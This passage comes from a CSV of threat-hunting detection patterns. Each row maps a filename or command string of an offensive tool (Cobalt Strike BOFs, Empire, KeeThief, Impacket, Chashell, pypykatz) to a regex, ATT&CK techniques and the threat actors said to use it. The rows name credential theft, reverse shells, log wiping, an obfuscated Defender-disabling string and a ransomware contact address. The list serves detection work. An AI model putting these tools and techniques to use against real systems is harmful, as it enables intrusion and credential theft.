Evasion","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","N/A","10","1","51","16","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z","56903" "*RegReeper.exe*",".{0,1000}RegReeper\.exe.{0,1000}","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","N/A","10","1","51","16","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z","56904" "*RegReeper.sln*",".{0,1000}RegReeper\.sln.{0,1000}","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. 
RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","N/A","10","1","51","16","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z","56905" "*RegReeper.vcxproj*",".{0,1000}RegReeper\.vcxproj.{0,1000}","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","N/A","10","1","51","16","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z","56906" "*Reg-Restore-Persistence-Mole-main*",".{0,1000}Reg\-Restore\-Persistence\-Mole\-main.{0,1000}","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. 
RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","N/A","10","1","51","16","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z","56907" "*regsvr32.exe .\Redemption.dll*",".{0,1000}regsvr32\.exe\s\.\\Redemption\.dll.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","0","N/A","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","56909" "*regsvr32.exe .\Redemption64.dll*",".{0,1000}regsvr32\.exe\s\.\\Redemption64\.dll.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","0","N/A","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","56910" "*regsvr32.exe /s /n /u /i: * scrobj.dll*",".{0,1000}regsvr32\.exe\s\/s\s\/n\s\/u\s\/i\:\s.{0,1000}\sscrobj\.dll.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","0","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","56911" "*regsvr32.exe -u 
.\Redemption.dll*",".{0,1000}regsvr32\.exe\s\-u\s\.\\Redemption\.dll.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","0","N/A","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","56912" "*regsvr32.exe -u .\Redemption64.dll*",".{0,1000}regsvr32\.exe\s\-u\s\.\\Redemption64\.dll.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","0","N/A","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","56913" "*regsvr32_command_delivery_server*",".{0,1000}regsvr32_command_delivery_server.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","56914" "*reinstall_original_pw.py*",".{0,1000}reinstall_original_pw\.py.{0,1000}","offensive_tool_keyword","POC","Zerologon CVE exploitation","T1210 - T1068","TA0001","N/A","N/A","Exploitation tool","https://github.com/risksense/zerologon","1","1","N/A","N/A","N/A","7","657","146","2020-10-15T18:31:15Z","2020-09-14T19:19:07Z","56915" "*rekallreader.py*",".{0,1000}rekallreader\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","56916" "*relay*/utils/enum.py*",".{0,1000}relay.{0,1000}\/utils\/enum\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","56918" "*RelayPackets.py*",".{0,1000}RelayPackets\.py.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","N/A","10","4656","1722","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z","56920" "*Release of BloodHound*",".{0,1000}Release\sof\sBloodHound.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","56922" "*Release.Lime-Crypter.v0.5.1.exe.zip*",".{0,1000}Release\.Lime\-Crypter\.v0\.5\.1\.exe\.zip.{0,1000}","offensive_tool_keyword","Lime-Crypter","An obfuscation tool for .Net + Native files","T1027 - T1045","TA0005 
","N/A","N/A","Defense Evasion","https://github.com/NYAN-x-CAT/Lime-Crypter","1","1","N/A","N/A","9","6","515","199","2024-04-22T21:31:18Z","2018-07-14T13:44:58Z","56923" "*release/chaserv*",".{0,1000}release\/chaserv.{0,1000}","offensive_tool_keyword","chashell","Chashell is a Go reverse shell that communicates over DNS. It can be used to bypass firewalls or tightly restricted networks","T1071.004 - T1572 - T1071 - T1027","TA0011 - TA0005 - TA0008","N/A","PYSA","C2","https://github.com/sysdream/chashell","1","1","N/A","N/A","10","10","1068","135","2022-04-05T17:22:14Z","2019-02-15T14:54:48Z","56924" "*release/chashell_*",".{0,1000}release\/chashell_.{0,1000}","offensive_tool_keyword","chashell","Chashell is a Go reverse shell that communicates over DNS. It can be used to bypass firewalls or tightly restricted networks","T1071.004 - T1572 - T1071 - T1027","TA0011 - TA0005 - TA0008","N/A","PYSA","C2","https://github.com/sysdream/chashell","1","1","N/A","N/A","10","10","1068","135","2022-04-05T17:22:14Z","2019-02-15T14:54:48Z","56925" "*release/mipsel_agent*",".{0,1000}release\/mipsel_agent.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","56926" "*Release/S-inject.exe*",".{0,1000}Release\/S\-inject\.exe.{0,1000}","offensive_tool_keyword","S-inject","Windows injection of x86/x64 DLL and Shellcode","T1055 - T1027","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Joe1sn/S-inject","1","1","N/A","N/A","10","4","313","45","2025-04-06T08:06:39Z","2024-02-05T04:39:10Z","56927" "*ReleaseKeePass.exe*",".{0,1000}ReleaseKeePass\.exe.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration 
Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","56928" "*ReleaseKeePass.exe*",".{0,1000}ReleaseKeePass\.exe.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","56929" "*ReleaseKeeTheft.exe*",".{0,1000}ReleaseKeeTheft\.exe.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration 
of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","56930" "*Release-ReflectiveDLL\Implant.x64.pdb*",".{0,1000}Release\-ReflectiveDLL\\Implant\.x64\.pdb.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","56931" "*reltypade1977@protonmail.com*",".{0,1000}reltypade1977\@protonmail\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","56932" "*rem call nthash-win64 /getntlmhash*",".{0,1000}rem\scall\snthash\-win64\s\/getntlmhash.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","56933" "*rem cheap bruteforce ... very slow ... 
ok for a few passwords*",".{0,1000}rem\scheap\sbruteforce\s\.\.\.\svery\sslow\s\.\.\.\sok\sfor\sa\sfew\spasswords.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","56934" "*REM Generate meterpreter dll payload*",".{0,1000}REM\sGenerate\smeterpreter\sdll\spayload.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta - FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","56935" "*REM getting browser history*",".{0,1000}REM\sgetting\sbrowser\shistory.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","56936" "*REM Title: Harvester_OF_SORROW*",".{0,1000}REM\sTitle\:\sHarvester_OF_SORROW.{0,1000}","offensive_tool_keyword","Harvester_OF_SORROW","The payload opens firefox about:logins and tabs and arrows its way through options. It then takes a screen shot with the first set of log in credentials made visible. 
Finally it sends the screenshot to an email of your choosing.","T1056.001 - T1113 - T1512 - T1566.001 - T1059.006","TA0004 - TA0009 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/blob/master/payloads/library/credentials/Harvester_OF_SORROW/payload.txt","1","0","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","56937" "*REM wipe the logs*",".{0,1000}REM\swipe\sthe\slogs.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","56938" "*-Rem@ov@eDef@ini@tio@ns -@Al@l*",".{0,1000}\-Rem\@ov\@eDef\@ini\@tio\@ns\s\-\@Al\@l.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","56939" "*remiflavien1/recon-archy*",".{0,1000}remiflavien1\/recon\-archy.{0,1000}","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","N/A","7","1","17","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z","56946" "*Remote 
Access.\n\nA wrapper around commands to make agent generation easy4u.*",".{0,1000}Remote\sAccess\.\\n\\nA\swrapper\saround\scommands\sto\smake\sagent\sgeneration\seasy4u\..{0,1000}","offensive_tool_keyword","blackvision","Command line Remote Access tool (RAT) for Windows.","T1090 - T1095 - T1008","TA0011","N/A","N/A","Malware","https://github.com/quantumcore/blackvision","1","0","N/A","N/A","10","1","14","10","2019-09-16T18:32:51Z","2019-07-04T17:32:35Z","56948" "*-remote -destPipe * -pipeHost * -destHost *",".{0,1000}\-remote\s\-destPipe\s.{0,1000}\s\-pipeHost\s.{0,1000}\s\-destHost\s.{0,1000}","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral Movement","https://github.com/p3nt4/Invoke-Piper","1","0","N/A","N/A","N/A","3","295","51","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z","56967" "*Remote Potato by @decoder_it and @splinter_code*",".{0,1000}Remote\sPotato\sby\s\@decoder_it\sand\s\@splinter_code.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","N/A","10","10","1697","228","2024-09-04T17:09:30Z","2020-04-12T17:40:03Z","56968" "*Remote System - MDE_Enum *",".{0,1000}Remote\sSystem\s\-\sMDE_Enum\s.{0,1000}","offensive_tool_keyword","MDE_Enum","extract and display detailed information about Windows Defender exclusions and Attack Surface Reduction (ASR) rules","T1070.006","TA0005 - TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/0xsp-SRD/MDE_Enum","1","0","N/A","N/A","8","2","198","18","2024-06-10T18:40:27Z","2024-06-06T15:54:44Z","56987" "*Remote/lastpass/lastpass.x86.*",".{0,1000}Remote\/lastpass\/lastpass\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - 
T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","56992" "*Remote/setuserpass/*",".{0,1000}Remote\/setuserpass\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 
- T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","56993" "*Remote/shspawnas*",".{0,1000}Remote\/shspawnas.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - 
TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","56994" "*Remote/suspendresume/*",".{0,1000}Remote\/suspendresume\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - 
EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","56995" "*remote_exploit.erb*",".{0,1000}remote_exploit\.erb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY 